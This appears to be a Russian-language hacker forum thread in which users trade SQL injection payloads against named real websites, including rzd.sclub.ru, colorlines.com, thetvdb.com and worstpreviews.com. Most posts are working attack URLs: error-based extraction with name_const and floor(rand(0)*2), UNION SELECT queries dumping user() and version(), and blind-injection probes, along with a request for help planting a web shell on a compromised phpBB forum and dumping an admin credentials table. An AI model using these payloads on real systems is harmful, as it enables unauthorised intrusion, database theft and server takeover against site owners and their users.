Code: http://rzd.sclub.ru/page.php?page=53'/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+and+'1'='1 Duplicate column name '5.0.87-log'
По поводу первого - начиная с пятой версии (5.0.какая то, не помню точно) мускула, нельзя оставлять комментарий открытым, а следовательно и использовать его не вариант. По поводу второго - очевидно, что если строка не обрубается комментарием -- 1, то значит запрос многострочечный. Решить это очень просто - обращаемся к той же таблице, что и первоначальный запрос, но колонки уже - произвольные данные. Далее используем where 1=1 or '1'='1 В результате вывод не будет зависеть от условия, а открытая кавычка закроется другой. Code: http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18+from+mobiticket.structure_page+where+1=1+or+'1'='1 Обращение к другой таблице - через запятую: from mobiticket.structure_page, bla_bla_bla
Или через where указывая номер записи или на месте выводимой колонки юзать подзапрос. P.S. но при желание можно и лимиты юзать, тогда еще одно объединение запроса нужно: Code: http://rzd.sclub.ru/page.php?page=53'+and+1=2+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18+from НУЖНА ТАБЛИЦА а тут лимиты))+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mobiticket.structure_page+where+'2'='1
напримепь есть саыт xxx.com/news.php?id=2 кояда зделаеш ххх.com/news.php?id=2 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'tw'' at line 1 Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/twt/public_html/cp/lib/db.php on line 28 а кояда ххх.com/news.php?id=2+union+select+0 Forbidden You don't have permission to access /browse.php on this server. что зделать ?
ребят есть форум phpbb,сделал рестор базы из txt файла,но не могу загрузить шелл так как cmd=eval(file_get_contents( выдает error allow_url_fopen = on allow_url_include= off команды bash нормально работают, на сервере есть phpmyadmin,попробовал найти конфиг скрипты MySQL чтобы попасть в панель phpmyadmin,но ниче не нашел. есть идеи?
Хелп! ...если это вообще возможно... есть скуля: /?id='')or+(select+count(*)+from+information_schema.tables+group+by+concat((select+(concat(table_schema,':',table_name))+from+information_schema.columns+where+column_name+like+'%pass%'+limit+0,1),floor(rand(0)*2)))+--+ имеем Duplicate entry 'a1323:tbladmin1' for key 1 база a1323, табла tbladmin а тут: /?id='')UNION+SELECT*from+(SELECT+*+FROM+tbladmin+JOIN+tbladmin+b)a+--+ выводит такую ошибку Table 'a1323.TBLADMIN' doesn't exist дело в том, что там id переводится в апперкейс. возможно ли как-то с этим бороться? хексы, чары и прочие известные мне приблуды в FROM не годятся. значит должны быть НЕизвестные... а? что скажете, господа
там походу нет инъекции. у меня тут тоже пару подсобралось http://www.colorlines.com/article.php?ID=681' http://thetvdb.com/index.php?tab=series&id=79771' http://www.worstpreviews.com/headline.php?id=15683 не получилось раскрутить
2BrainDeaD http://www.colorlines.com/article.php?ID=681+and+substring(@@version,1,1)=4+-- крути как блинд
Code: 1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(),1,1)=4 2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+ 3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version(),1,1)=5
